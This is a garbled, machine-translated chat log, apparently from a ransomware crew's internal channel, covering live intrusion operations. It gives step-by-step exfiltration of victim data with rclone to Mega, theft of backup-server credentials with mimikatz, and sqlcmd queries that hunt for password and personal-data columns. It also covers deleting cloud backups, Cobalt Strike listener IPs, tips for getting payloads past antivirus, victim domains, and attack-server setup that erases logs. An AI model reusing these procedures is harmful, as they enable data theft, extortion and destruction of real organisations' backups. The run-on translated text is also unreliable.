This prevents anyone (including employees of Mega) from accessing the files without knowledge of the key used for encryption.* In general, as I understand the files are all encrypted locally before they are uploaded, so there is no need to make encrypted archives.then with the same wmic you can check if the process is running, if it is, it works ok wmic /node: "HOST" /user: "home_log" /password: "passport" process get description,executable convenient to feed the necessary files via sms to remote hosts, and then wmic startconfig after generation can be placed near exe and run it with parameter --config, for example rc.exe --config C:\Users\Administrator\rc.conf copy "C:\Users\Administrator\" mega:data, remote is the name of config, which you generate through rclone config, if the name of config you specify for example mega it will be mega:data,` guys, I tell you how to use rclone: 1. download the program itself (posted in general), create a file rclone.conf and put it in the same folder with the exe 2. Next, open the kmd from the admin, go to the folder where the program lies with the configuration file and run the command: rclone config 3. Then pop up menu, where we create a config (roughly speaking, roll in the gods mega), after the gods rolled in, the program writes them to the file rclone.conf, in encrypted form. 4. Take this rclone.conf file and the program itself and put it on the host from which we are going to download the information. 5. 
Fall into the cobweb into the folder where you put the config and the program and run the command: shell rclone.exe copy "\trucamtldc01\E$\Data" remote:Data -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 Well, I think it is clear here, what is in quotes is what we download, we can specify anything, even the whole disk remote - the name of the config file you specified in step 3, data - the folder in the mega, where the info is downloaded Thank you ``so naturally).confgenerate usually on their virtualtoolkot you and silent installation and next to lay and startconfig generate manuall on silent installation pklon? @all no one wrote a query yet automatic database mssql ? query the database, tables and a couple dozen lines of the first 25-30 most live would be very helpful ...but I sit by the way with the web, all ok ( browser Opera ) and now with proxychains \ proxychains4 can the same stuff, I have to reload the page if you see that there are new messages ... web version with thor sadness sadness the appa is ok. you can proxy it (it used to be possible) i have the menu always hidden, clearing cookies helps, but it goes around, the web version seems to be unstable i have everything ok. 
why rocket so fuck tweeter who is this and my batts also there part of my kobu who is this@all https://twitter.com/AltShiftPrtScn/status/1350755169965924352 change the malleable profile gentlemen desktop without bugs works fine through the web version bugs were before the server update, the desktop version is all ok I was also offered to update tor, and then restart + click on the scoop to clear the then if the web browser cache cleanse mb help Restart did not help, the same bug.me all ok...helped, thanks) i had the same, restart toruspisk in place i had the same problem with the restart of the torispisk, but i got kicked out of the chat. forced logout.((guys, all normal rocket work? i sit through the web, and i have a bug list of chats on the left and disappears in a second it will rip, about restore i do not know have tried deleting backups from the central viam where the button delete backup from the drive - it then rip is removed and will not restore? slice + @all All Who WORK WITH SONICWALL's Please, when I upload new dumps take them AT ONCE, because web-sessions for authorization tend to run out fairly quickly, as soon as I download the archive with sonic - immediately try to get if there 2fa, first just via vpn - if the code falls out - then climb through the web-session in the admin and look whether there rndp or something like that to start upbro I was sick, do not know anything@all wrtdesign.i can't see the confab, there are fresh sessions with sonic from there we're streaming) subscribers were not happy with the old chat room (pun intended, bro) "like" likes all now there will be twice as many locks with this chat roomintuitively everything is clear and nice smiley:update passed and should be faster beautifully)@all UPDATED@all the rocket update will now a little delayed a little bit) don't give a shit :joy:= )just kidding) m? 
la the feds are upgrading the sniffer again @all it's time to upgrade the rocket don't be scared) it will go back up in no time) @all THIS IS IMPORTANT started noticing crookedly configured listener in other people's cobalt it is RIGHT to write the domain of the pad both in HTTPS hosts and in HTTPS Host (Stager) if you write ipac with htts host (Stager), the shaping process goes "bypassing" the SSL certificate which is on the pad - which is FUCKING and adds blockages by phasers if you have viam, check it, it should be there...i know viam has one, but a third party, you need to look.... da, like a viewer for the tank? no, there is some guye tool which goes straight to the tank to look I just forgot the name completely(((shell sqlcmd@allHi, can you tell me the utility that sql .hello, could you suggest a utility that opens the sql . bak file@all today I'm distributing cases for work, who is not busy - write to your teammates and we'll watch ipnchiki sitelefantа you can also use maxtom browser router from the soul you can use desktop client we think so bypass the server from which you try to get in the date put January 1, 2021 guys, salam, urgently, how to bypass the old version of adobe to get into the scope ` ` `https://riccardoancarani.github.io/2019-10-04-lateral-movement-megaprimer/ ``` nice article about lateral muvGetting access to the server with Shadow Protect SPX (StorageCraft) backups ``` == 1. Log on to one of the servers via RDP, in my case is the SQL server. 2. On the desktop, we see the icon of ShadowProtect SPX -> click on it. 3. the GUI opens (if you are prompted for credentials, enter the credentials under which you signed in via RDP, or any other software) 4. 
On the left side in the "Job Summary" block you will see the detailed description of backup scheme In the "Name" field - backup name of our server in the "Destination" field - place WHERE our spx stores backup copies, as BACKUP NAME (BALL WITH BACKUP ON THIS SERVICE) From our example we can conclude that all backup files are stored in a ball named StorageCraft, and the folders with backup servers are named with the name of the server itself. 5. Knowing the name of backup server, we want to get more information about his structure, the first thing we do is to get a balloon with the command "cmd.exe> net view \\\COH-DSS3 /ALL", in response we get "Error 5: Access Denied". 6. No access, trying to bang on the accounts of other people - the answer is the same - Error n 5, it would be logical to assume that in order to gain access to the server, we need either the credentials of the local admin on this very server, or account of a special user with special privileges 7. Let's assume that if it is a dedicated user, he has a similar name to the software/function: we go through the logins with substrings (here we need to get fancy): Storage Shadow Protect Craft SP SPX Backup BUUser ETC. Then do a search for ntds.dit (hashes.txt.ntds) to find the hash, in my case, the search was successful and I found the user Humanity.local\SPAdmin (I think it is clear that it is Shadow Protect Admin) and its hash ce31b806821bec116ba03132ab5b3138, but unfortunately, search on cmd5.org not result and I desperately need the clearance. (If you have enough hash, congratulations - you got the result.) 8. But if you still need a clipart or you can not find the right user, we understand that if the software somehow knocked on the server, she knows the credentials, which means they can stay on the server. 
Try to dump hashes Here I will not describe in detail how to do it, but you should try hashdump (and its legitimate analogues) and logonpasswords (and similar) In my case I used mimic and saved the passwords and found the clirapass from my SPAdmin account - kerberos: * Username : SPAdmin * Domain : COHBackup * Password : Backup!User (in my case for some reason the domain was not Humanity.local but COHBackup, although you can also knock with Humanity.local (replace it with your own value)) 9. Going into Explorer, and open through it the necessary sphere "\\COH-DSS3\StorageCraft" at me asks for credentials, I enter COHBackup\SPAdmin and Backup!User and successfully get access 10. Also in some networks backup servers can be a few, as an option to check this, is to click on the button Backup in the upper left corner of the gui (just after File) then Destinations -> and we will see what is the way to save the backup === Not sure if this method will work for everyone, but in my case it worked, good luck! ``Githab Links can add a forum section where you can drop off useful sites, links, articles, etc@all I often go to everyone today, which is unusual, but one more announcement. i wish to collect some pool of similar documents in public access so that everyone could read them, they often describe fairly standard things, but it's useful to know them allInject into sqlserv.exe process or any other process run from under this user when working with databases you need either creeds or skl token of service user on the database server yes, here is the instruction if you do not have on the whim ``` 1. Display all the databases on the server in kmd sqlcmd -S localhost -E -Q "SELECT name FROM master.dbo.sysdatabases;" You can also add a port 1.2. 
to view a non-standard port from a skullserver, you need to type | shell netstat -abno | = scan ports and services on them through the cobald there you find the port | sqlservr.exe | is running on and specify it after localhost like this - | localhost,12345 | 1.2.2.Display in kmd all databases on the server with size in megabytes sqlcmd -S localhost -E -Q "SELECT d.name, ROUND(SUM(mf.size) * 8 / 1024, 0) FROM sys.master_files mf INNER JOIN sys.databases d ON d.database_id = mf.database_id WHERE d.database_id > 4 GROUP BY d.name ORDER BY d.name;" 2. Unload the 100 most saturated tables in the database by number of rows, number of rows and size of tables on disk sqlcmd -S localhost -E -Q "USE %databasename% SELECT TOP 100 s.Name AS SchemaName, t.Name AS TableName, p.rows AS RowCounts, CAST(ROUND((SUM(a.total_pages) / 128.00), 2) AS NUMERIC(36, 2)) AS total_MB FROM sys.tables t INNER JOIN sys.indexes i ON t.OBJECT_ID = i.object_id INNER JOIN sys.partitions p ON i.object_id = p.OBJECT_ID AND i.index_id = p.index_id INNER JOIN sys.allocation_units a ON p.partition_id = a.container_id INNER JOIN sys.schemas s ON t.schema_id = s.schema_id GROUP BY t.Name, s.Name, p.Rows ORDER BY RowCounts desc, Total_MB desc;" 3. Counting rows in a specific table of a specific database sqlcmd -S localhost -E -Q "select count(*) from %databasename%.dbo.%tablename%;" 4. Unload the first 10 records in a specific table of a specific database sqlcmd -S localhost -E -Q "select top 10 * from %databasename%.dbo.%tablename%;" sqlcmd -S localhost -E -Q "use %databasename%; select top 10 * from %tablename%" -W 5. Search by column names in a specific database using %pass% as an example sqlcmd -S localhost -E -Q "select COLUMN_NAME as 'ColumnName', TABLE_NAME as 'TableName' from %databasename%.INFORMATION_SCHEMA.COLUMNS where COLUMN_NAME like '%pass%';" 6. 
Dump the contents of specific columns from specific table into txt file on hard drive in folder (in this example by number value of table > dates sqlcmd.exe -S localhost -E -Q "select UserKey, EmailAddress, RealName, Phone, FirstName, LastName, CountryName, CreatedDate from %databasename%.dbo.%tablename% where CreatedDate > '2017-11-30';" -W -s"|" -o "C:\temp\123.txt" 7. Output all tables of a particular database sqlcmd -S localhost -E -Q "use %databasename%; exec sp_tables" -W 8. Backup database sqlcmd -S localhost -E -Q "BACKUP DATABASE name TO DISK='C:\PerfLogs\name.bak'" for remote/other local server change localhost to ip,port alternatively localhost,%port% (watch netstat) + 9. to choose a non-standard port for the mscl, type ip,port = localhost,52541 example + ``I'll either add something myself or ask the guys @tony to write a topic there, make a request instead of password, put any other key and the variable %databasename%Search by column names in a particular database by the example of %pass% ``` sqlcmd -S localhost -E -Q "select COLUMN_NAME as 'ColumnName', TABLE_NAME as 'TableName' from %databasename%.INFORMATION_SCHEMA.COLUMNS where COLUMN_NAME like '%pass%';" ``Forum is great, I personally lack detailed information on working with skl databases only, with examples of tables and records that interest us@all about the forum, write friends, do not be afraid to say or ask stupid, usually if someone has a question - it will probably be several other people, and having it written down for all will be usefulkalinkaGentlemen, who used Headless Burp and can help, write in PM, please.mine added@all standardpro.com whose case? where's the conf? 
@all who wrote asked to cut the forum - duplicate in private now in half an hour will doPisplayed in pm.@all guys hello, I remember who wrote about copying pklon information from the mega to the dedic, write to lps there are a couple of questions who did so today this rocket will probably fall off a few times, it is planned if anything, do not worry all hello.++++:v:hello The structure is as follows. The current squad is divided into groups, each group is assigned to a team leader (one or two, depending on the size of the group). Ateam - team leader rozetka Bteam - team leaders red and ali Cteam - team leader steven Team Leaders' area of responsibility includes: 1. Issue cases for work 2. Teach, advise, mentor. 3. Connect in the process of solving atypical or unprecedented tasks 4. Help with builds of loads, fixing in the network and other technical questions concerning the software. 5. Provide the necessary guides and manuals. The working group is required to: 1. Listen to 2. Watch 3. Doing 4. Learning 5. Asking questions 6. Follow guides and instructions, complete tasks The approximate rules of procedure are as follows. - Received the session - Captured primary data - Create a channel in the rocket (all have this feature), the channel name is the full primary domain case (eg google.com microsoft.com), add me + your group teammates there - Fill the channel with primary information according to a given template (the domain adfind output, the list of domain admins, foreign admins, local admins, kerberos hashes, seatbelt output, sharefinder output, etc.) We work from 15 to 01 From 19 to 20 we have a public debriefing in the discussion channel. Any questions of technical nature there too. On organizational questions - write to personal. 
``mrFlintstonesstakanbradtwinalexstevenredgreenwhiteAndyflyAraratmagaalialterrozetkaShvedmichaelgiovannisamueldlit would rub...and do not pliz leave it on the dll if there is an option not to do so btw accepted.If the session injected into the process - it will not fall if you leave it on the dll - it crashes after a few hours while these are observations) I checked on a couple of servers - there was no reboot, but the session fellaprobesthe next time, as you restore the session, look how long the computer is running, something like this: `(Get-Date (Get-Process explorer).StartTime).ToString('yyyyMMdd')` As I understand it separately in some networks, apparently something in the iron I had 2 times, on several machines in 2 networks ... but perhaps, as noticed - was restarting the servers, I did not watch the life of the computer was such, when a big slip put for 10 minutes from sleep mode returns. on vorkstantsyya possible, servaki usually reset dies, it is in memory but the technologist asks about the otherReal after restarting the computer session should die?) a follow-up question - how to remove jitter 300 seconds? i got tired of accidentally dumping my session to a slip and in 3 or 4 hours the session crashes. 
does anybody else crash sessions at night for no reason?zvhhitechTyrara senkeeset file security, signature - win64/rozena.ICt just what's here@barabulkaVanoATXGrimnir on 2016 server the dll ran, everything okhttp://dyncheck.com/scan/id/0e85df67f128617619f46255d62b1a1e 1/23 AhnLab V3 Light of some kind is giving dynamite detection checked on dyncheck dll x64 on 2008 crashes eheCodeocta0dayinbizhttps://dyncheck.com/scan/id/5b13716a94a301b0faef2dd60ef09b07#collapse_info entry points for dll ``` DllRegisterServer DllInstall DllUnregisterServer Control_RunDLL ``@all working update I think I need to test it on vin 10 and fix it on 7, same story on 12, same story with both folders tested on 2016 server x64 without AB i also noticed the size of the dll itself increased 4 times compared to the dlls from the previous artifact x64 as well as x86 is much better than previous artifact. 360 Total Security Essential palitoto here take it down? if so - add it in the new confuA how is the situation here? i do not understand in the other rocket i do not see this case i know i have it, but i do notprivet, and when we and alex will be given the dedicates and servers for the msf? We're waiting foroxox I'm about two months away Fuck. Fill it up and I'll delete the room. we're stuck in old records, nothing's been uploaded yethttp://www.veeam.com/exagrid-storage-solutions.html who has dealt with such a thing? it seems likehttp://www.carbonblack.com/ black some othertosofos not so evilsantinelcylantecsimantec palitosofos - simantecHello all advise AV, the utilities are the most evil that stinks everything for the testovaa von, got the spvc thanks the output should be something like this : ``beacon> shell net helpmsg 5 [*] Tasked beacon to run: net helpmsg 5 [+] host called home, sent: 44 bytes [+] received output: Access is denied. 
``you forgot the shell in the commandb> net helpmsg 1326 [-] net error: argument 'helpmsg' is not a net commandnet helpmsgnet helpmsg (# errors)and so is 67 writes[-] could not open \kumerafil2\c$\*: 13261326 and 67 what does it mean who knows the error codes in the cob? +http://rus-linux.net/MyLDP/consol/7z-command-switches.html look. maybe there will be something here if I am not mistaken usual 7zip can be used as a portable, I downloaded the usual and a folder of 5 files dragged to different cars everywhere workedconsolehttp://portableapps.How can you check if trust is alive or not? if it's not worth the hassle ? on his cludes and in general azur has something that if you deleted it can be restored in some time ? look systeminfo azzur's boxes have some signs that are certain find where they are and that's it should be written where he poured bekapyna I say not like you may server itself in the cludes azurai came to the conclusion that it is in the cludes azur because they are on the screenshot pin that need to change the job or delete bekapytam like 235 gig was, i had 32 copies and i don't know where the fuck it is, it was late, it was at night (i mean the drive without a letter) i fucked up NAS, local backups too, and it lets me roll backups, usually if the system is azure it says the folder is called windows azuredisk management open it, there will be an unplaced drive with the backup therewindows server backup saw how it works?you see how it works? it's not like they'll roll it back and fuck it up. you can't block it? well, the windows server is local where your backup agent hangs - it's probably the azure cloud server. the shit on the screenshot is usually a local backup server. you mean the azure server in the cloud remotely in the azure cloud cloud service. 
it's like https://www.pvsm.ru/images/Windows-Azure-Recovery-Services-chast-3-rabota-s-Backup-Agent-17.png what do you mean by servera azuranu not on the servera azur what do you mean bekaps somewhere in the cloud, lookup then how it worksetazur bekap agent how it looks like that there is nowhere to ask for authorization wife can go to the desktop application if you say it is there and where in the browser on the site azur?either not mail, but domain username, try domain mail and domain passstam ldap authorization in browsers nemoginov in the application itself uzura and in the service voidonu not specified anywhere there need at least a login to knowiibo it is most often under CCOv ashur cloud you will most likely get one of the domain admins that is not always available or there is another tool or just look for an account with admin pc?and it helps? I can't find it in the application://prnt.sc/vlu4i8guys, what are the options to get the account of the windows azur backup? the application itself is authorized, it probably works on the api, you can rip the account out of it or neon is not rehiddenThat? transferred? if so - add to the group on the simantek was a pass, I gmer shut down the processes and the folder simantek main removed from the pc) thus, but at least the exe it detected before, after such manipulations stopped and is nowhere in the processes after the demolition reboot simantek? if you have not rebooted, sometimes there is still an avr, but if you reset, everything that was in the lsass will fall out and you will have to wait again for someone to authorize you hashdump may try and local hashes...simantec was, but i had to take it down, i am googling, but i still do not understand, privilege::debug is written, was it made on 2003 server? maybe it detects lsass and crashed the dump did you try google the error? did you do privilege::debug? originally not) but then exactly x86 and the same error did you run x86 mimicatz for sure? 
hello gentlemen, who has met may be why the dump does not decrypt mimicatz: ``` Opening : 'lsass.dmp' file fr minidump... Error kuhl_m_sekurlsa_acquireLSA ; Modules informations ``` I shot through procdump with windows 2003 it seems that there is no analog VNC no avs? Hello, anyone familiar with AWS, there is a network with access to the AWS lk, there are virtual machines, it created a user with the rights, is it possible how this user (newly created) to put in the domain, then on the rd to get in with the creeds. I have not dealt with this before, read the manual, did something, but alas, no luck so far, there how? I understand, in touch, let me know how things go and let's move on with these mebusi already a week to do the session prokitelst what to do?ok, i'll keep trying to sneak the network hello, i'll be in touch ok, i'll get it right away@stakan take it for yourself right away stakanAbout 2 months this case lasts? did you see? what about grandpa@all the contents of the LLVM folder overwrite the contents of the brooks-artifact-kit folder entry points for rundll32.exe for generated dlls ``` DllRegisterServer DllInstall DllUnregisterServer Control_RunDLL ``BugSuper``. [*] Manual DLL Inject - @tomcarver_ [+] host called home, sent: 219946 bytes [+] received output: EntryPoint found [+] received output: Injected. ``` with parameters -m local everything works great on the machine with the session (injector,massinjector)yes, near the corresponding .cna script before you had to put it in the cobalt diru tell me where to replace these boff files, where to put)? ah, ok))) and now they will work even better they workedwait, and if injectors worked?) just replace it and everything should start the only Bofy cna not changed? 
oh_o found@all Urgent update your BOF files injector, builds that are in work since monday this week with the old injector will NOT start and do not forget to reload do .cna script@all IMPORTANT ARTIFACT KIT UPDATE Everyone download the archive and replace the files in the folder "over", all files! I'm all ready to go! restore the computer after cleaning and formatting softswitch and otpisheponyal, I will storm it) well it's okay, he wrote, silent pokapishy steve if they did not give ′ nishtyakdali server did not give anything yet?hello + @alter need to reshoot@alter need to reshoot vidimov all the credits nevalidu steven was worked up, what to do? idle sit that network is dead, do not know what to do with it alex also looked into it and he doesn't know what to do. No vulnerabilities found on ms17. only polzak's creds, no brute force to admins, no local or domain one, i saw mimicatz myself, password from polzak, hashdump did not get anything vyacheslav kerber rez to chat with the network, from chrome did not pull anything interesting there is nothing, there are crosses from polzakov valid, but the admin pass not a single come up, on the ms17 deaf doo so brandon how are you doing in the network without anyone alive ? 
so what anyone do hello there is 1n, only session is not available you have only 1 server like you do how long ?i thought we were going to do the lock grid, the one that wrote the glass, what are you doinga hello, i'm looking at the same grid you gave me guys write down who's doing whattv all hey guys will be 3-4 hours, i need a break in the morning here:flint write me back as soon as the channel is createdmain windows/beacon_https/reverse_https 142.202.205.88 443 142.202.205.88mainbrandonso sorry, stupid ipi that, port 443britz listener, not access to cobalt123123098qwepoi195123.213.122 port 35464sessione youbrandon give you listenerFLYNT wait listener in the network channel`` \STORAGESRV.ecampus.com\c$\Program Files\Barracuda\Barracuda Backup Agent\database see backups Should I mark such things here? Should I look at the backups at 600m? If so, what to do with this one ? i'll give you a new one on ecampus.com. i'm climbing )paralleyno do it flint now i'll find you a new one too as you say let me find you something small climbing through hosts looking for something interesting guys sign in with youstakan keep the net so who is busy sign in with youcbrad went away so he will be here soon so who is without a task hey hey@steven will be late today - lay in the morning, broke the arabs with a twin if you have no tasks - write to me in the meantime - i will find a grid to work hello + kk hello i'm doing mine@twin do arabiq guys what are you doing hello all hello do you not know her? let her go for now what i see but with the first one what do you do the net you passed out i also passed out, but wait a little i can not connect overload probably, should come back no that the rocket stopped working??so who else is out of business and now i'll give you a plus yes come on can you pass something? 195.123.213.122 | 123123098qwepoi | 35464?tvin what are you up to? -twin, what are you up to? -twin, what's up? -twin, what's up? -twin, what's up? -twin, what's up? 
-twin, what's up? -twin, what's up? -twin, what's up? -twin, what's up? -twin, what's up? -twin, you got the stakanpole + came -titan, alexa, I'll tell you about it now -titan, you got the session -titan, if you can't understand something, feel free, here's @brad, you got it on 3. 108.177.235.22 443main windows/beacon_https/reverse_https 142.202.205.88 443 142.202.205.88pass youdavayip listener + so who on the spot unsubscribe apparently went portdavaybrad ip cobaltauk udesmoxeti stiven will now distribute) do not need to take anything myself = )stev tried to not come I wonder why the networks where to take or wait until it will come?the server is working and configured as from the first day ) if you do not need to change the settings, everything works fine ``` right, working as we did on our servers, no new settings ? i have a similar setup from day one, so what are you guys doing ?@alter the server is working and configured like from day one ) if i don't have to change the settings, then everything works fine @alex what do you mean "no incoming data" ? i have no incoming data why i have all ok settings on my work servers - everything works fine for everybody ? @alex finalizes the case on the astronauts then on with @jason - no need to leave unfinished in the old confeno I all helped and explained:grin: so not alone:zany_face:hello tween me no one common was not:rolling_eyes: turns out I was one:confounded:Hello all I have the old networks, with jason, outlet. Well we have there stpornu I have a little was I and jason, but it seems to me in another ти тиmeso old nets like placated "we" is who? 
it is still unclear at what stage now we in the astronauts still sittingAnd who needs new to workSay, anyone finish old tasks which in the old rocket still remain?:v:alter and brandon hey here guys alter and brandon still wait 10 minutes = ) if it is delayed, i'll be there for him)not enough of a handlercropped by steve all here:v:alex krasaya zdes:smiley:hey hey stakashahi +:rolling_eyes:who do we not have yetubrad hi hi:v:hi broHi everybody:v::point_up:hibradon, herethere ?case is deaddad it was transferred@all cvmkfDe6Zh7tkWyKwljr2Z80cWSzWSHFTCxPd9OKFgvJsHhVxTdwaTgOd1EUJy12 whose? @all cwf.fr d-box.com groupemontoni.com owners of these cases - waiting for you@all unionleader.com thestaffzone.net owners of these cases, please let me know how do you download them? do you download them as a packaged archive or just as a diru? i can explain how to download from msfvenom and use it without tunneling through cobb who can explain how to make a session in msf without vpn-good manualls:thumbsup i will test@red probably installed it the other way around, but not for sure on Ubuntu it all works yeah, it's better to install the current version@red here i foresee a problem ``apt-get install default-jdk I showed you above how to set the TC for root, but I don't want to run the timeserver only as a user, here's my guide 1. Install the metasplot curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall ; ./msfconsole run the metasplot 2. Install Postgresql apt-get -y install postgresql 3. Installing Armitage wget http://fastandeasyhacking.com/download/armitage150813.tgz tar zxvf armitage150813.tgz Initialize the metasplot base msfdb init ; msfdb reinit - Deletes and reinitializes the database. ; msfdb delete - Deletes the database. ; msfdb start - Starts the database. ; msfdb stop - Stops the database. ; msfdb status - Shows the database status. 
export MSF_DATABASE_CONFIG=/home/%username%/.msf4/database.yml 5. Launch Armitage Teamserver cd /path/to/armitage ./teamserver [external IP address] [password] Useful Links Installing the Metasploit Framework - https://docs.rapid7.com/metasploit/installing-the-metasploit-framework/ Armitage installation - http://www.fastandeasyhacking.com/manual Required Packages `````` 1. take debian or ubuntu dedic (ssh username@hostname) Check availability of postgresql sudo apt install postgresql sudo apt-get -y install postgresql ============================================================================================================================ 2. Download and install the metasplot x64 wget http://downloads.metasploit.com/data/releases/archive/metasploit-4.16.2-2020011301-linux-x64-installer.run Next, we modify (allow the scripts to run) chmod +x metasploit-4.16.2-2020011301-linux-x64-installer.run chmod +x metasploit-4.13.0-2017022101-linux-x64-installer.run Next, the installation: ./metasploit-4.16.2-2020011301-linux-x64-installer.run https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run ============================================================================================================================ Leave all default ports and add a random local domain like addada.com ============================================================================================================================ 4. 
After installing the msf Installing the editor sudo apt install nano Editing scripts 1 nano /etc/init.d/metasploit #exec /opt/metasploit/ctlscript.sh "$@" exec /opt/metasploit/postgresql/scripts/ctl.sh "$@" Editing scripts 2 nano /etc/rc.local add these lines before exit 0 ln -sf /dev/null /var/log/wtmp ln -sf /dev/null /var/run/utmp ln -sf /dev/null /var/log/lastlog ln -sf /dev/null /var/log/auth.log ln -sf /dev/null /var/log/btmp ln -sf /dev/null /var/log/dmesg ln -sf /dev/null /var/log/faillog ln -sf /dev/null /var/log/kern.log ln -sf /dev/null /var/log/syslog ln -sf /dev/null /var/log/user.log ln -sf /dev/null /var/log/secure ln -sf /dev/null /root/.bash_history iptables -A INPUT -i eth0 -p tcp -m tcp --dport 3790 -j DROP ============================================================================================================================ 5. Set the java to make the armitage work apt-get update && apt-get upgrade apt-get install default-jdk ============================================================================================================================ 6. Download and unpack the armitge (toolserver) from this url (tgz archive is up to date) wget http://fastandeasyhacking.com/download/armitage150813.tgz tar zxvf armitage150813.tgz ============================================================================================================================ 7. Change the port in armitage (before running) in the teamserver script near the end of the file nano armitage/teamserver ============================================================================================================================ 8. 
Open screen (so that you can run armitage in the background and exit the server), and run apt-get install screen launch the screen cd /root/armitage && ./teamserver IP PASS (the IP of the external interface of the dedicates and the pass is more complex) ============================================================================================================================ 9. Wait until everything starts and a message appears with the credentials to armitage, and exit the screen with Ctrl+a and then separately d ============================================================================================================================ 10. Change SSH password (passwd root ...) ============================================================================================================================ 11. (change ssh port / make authorization by key to the server) nano /etc/ssh/sshd_config ============================================================================================================================ ``mkdir /opt/ cd /opt/ wget https://github.com/rapid7/metasploit-framework/archive/4.16.37.zip unzip 4.16.37.zip mv metasploit-framework-4.16.37 metasploit-framework sudo chown -R `whoami` /opt/metasploit-framework cd /opt/metasploit-framework gem install bundler bundle install cd /opt/metasploit-framework sudo bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done'@atom easily if msf is properly installed Help me raise the timserver from a normal position. you need a manual on how to raise the timserver, including this manual? but there is a problem with rights, I have not solved it in my own place. armitage guide ``http://www.fastandeasyhacking.com/manual For 3 years now everyone has been writing on forums about this error with bundler and hems, which is why the java won't connect to you$ gem install bundler I'll delete it later so it won't clog up the ether with this script ``` This tutorial is for Ubuntu. 
the first thing we do is install nano, screen, unzip sudo apt-get install nano screen unzip then create file 1.sh: nano 1.sh Then insert the code block: 1. installing java (1.sh) Code: sudo apt-get update sudo apt-get -y install --reinstall software-properties-common sudo apt-get install default-jre sudo apt-get update sudo apt-get -y --force-yes install git build-essential unzip libreadline-dev zlib1g-dev nano screen libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev curl zlib1g-dev sudo apt-get update sudo apt-get upgrade cd ~ git clone git://github.com/sstephenson/rbenv.git echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.bashrc echo 'eval "$(rbenv init -)"' >> ~/.bashrc exec $SHELL then CTRL+X (save) press Y ENTER ENTER repeat the same for each item set the rights: chmod +x 1.sh run 1.sh: ./1.sh Now each command is executed in turn 2. installing ruby (2.sh) Code: git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bashrc git clone git://github.com/dcarley/rbenv-sudo.git ~/.rbenv/plugins/rbenv-sudo exec $SHELL 3. installing ruby (3.sh) Code: RUBYVERSION=2.4.3 rbenv install $RUBYVERSION rbenv global $RUBYVERSION ruby -v 4. installing nmap (4.sh) Code: mkdir ~/Development cd ~/Development git clone https://github.com/nmap/nmap.git cd nmap ./configure make sudo make install make clean 5. create a database and a database user. execute the commands in turn (without. nano): Code: su postgres cd createuser msf -P -S -R -D #enter password qwe31337 createdb -O msf msf exit 6. 
installing msf (5.sh) Code: mkdir /opt/ cd /opt/ wget https://github.com/rapid7/metasploit-framework/archive/4.16.37.zip unzip 4.16.37.zip mv metasploit-framework-4.16.37 metasploit-framework sudo chown -R `whoami` /opt/metasploit-framework cd /opt/metasploit-framework gem install bundler bundle install cd /opt/metasploit-framework sudo bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done' 7. installing armitage (6.sh) Code: echo cHJvZHVjdGlvbjoNCiBhZGFwdGVyOiBwb3N0Z3Jlc3FsDQogZGF0YWJhc2U6IG1zZg0KIHVzZXJuYW1lOiBtc2YNCiBwYXNzd29yZDogcXdlMzEzMzcNCiBob3N0OiAxMjcuMC4wLjENCiBwb3J0OiA1NDMyDQogcG9vbDogNzUNCiB0aW1Lb3V0OiA1DQo=|base64 --decode > /opt/metasploit-framework/config/database.yml cd /opt/ curl -# -o /tmp/armitage.tgz http://www.fastandeasyhacking.com/download/armitage150813.tgz sudo tar -xvzf /tmp/armitage.tgz -C /opt sudo ln -s /opt/armitage/armitage /usr/local/bin/armitage sudo ln -s /opt/armitage/teamserver /usr/local/bin/teamserver sudo sh -c "echo java -jar /opt/armitage/armitage.jar \$\* > /opt/armitage/armitage" sudo perl -pi -e 's/armitage.jar/\/opt\/armitage\/armitage.jar/g' /opt/armitage/teamserver After installation, create a screen (to run in the background): screen -dmS arm screen -x arm cd /opt/armitage/ Run ifconfig to check your IP ./teamserver TUT_API_WDSKI TUT_PASSWORD ``You're not clinging to it,`` for some reason your msf is crashing. [*] Metasploit requires the Bundler gem to be installed $ gem install bundler ``I don't even know how to comment on this, does it work? Has anyone encountered this error when starting armitage? 
[*] Starting RPC daemon [*] Metasploit requires the Bundler gem to be installed $ gem install bundler [*] Sleeping for 20s (to let msfrpcd initialize) [*] Starting Armitage team server [*] Warning: checkError(): java.lang.RuntimeException: java.net.ConnectException: Connection refused (Connection refused) at server.sl:450schali it is,yes it puts both armagh and msf on BOX and msf should be on REMOTE BOXhttp://github.com/Matt-London/Install-Armitage-on-Linux what mushrooms are you eating?)))) it does not even need to install) and runs)) 100%armitage simply download) on the site armitage in the instructions are its installationa you armitage or a team serv? no, armitage is not through apt-get installed, and with a guitar if you do not care about the same download, there is armitage `` `` sudo apt-get install armitage -y cd Armitage sudo pip3 install -r requirements.txt sudo python3 armitage.py ``` like this on ubuntu for example koroche@slice have a suspiciona)most likely he meant the guide script for what? you can write a script yourself install it on wps? a few guys who works with armitage? ms17 - smb port kerba - ldapfwd and without sox will work you need to throw portsox5 from polzak who started in the local area? very necessary, polzak context, crowdedstrike, 1 yes, you need at least ms17\kerbu\adfind. edr all jammed all ok) what are these numbers?@graf @slice thanksspro key I know about 5 years ago, it was so-so, now I'll try another activation key and cost 10 - 20 dollarsautokms in virustotal vgoniana any other than crack?) trust me a little too little to nimavtokms?:sweat_smile:except directly to activate))) who knows a working way to remove the activation banner windows? @red downloads may not work if the default address assigned to a domain from the Web, and he originally came through tornashel)-@red on the direct - probably because of e2e, disable it in the settings. How do I get the settings to work properly with downloads? 
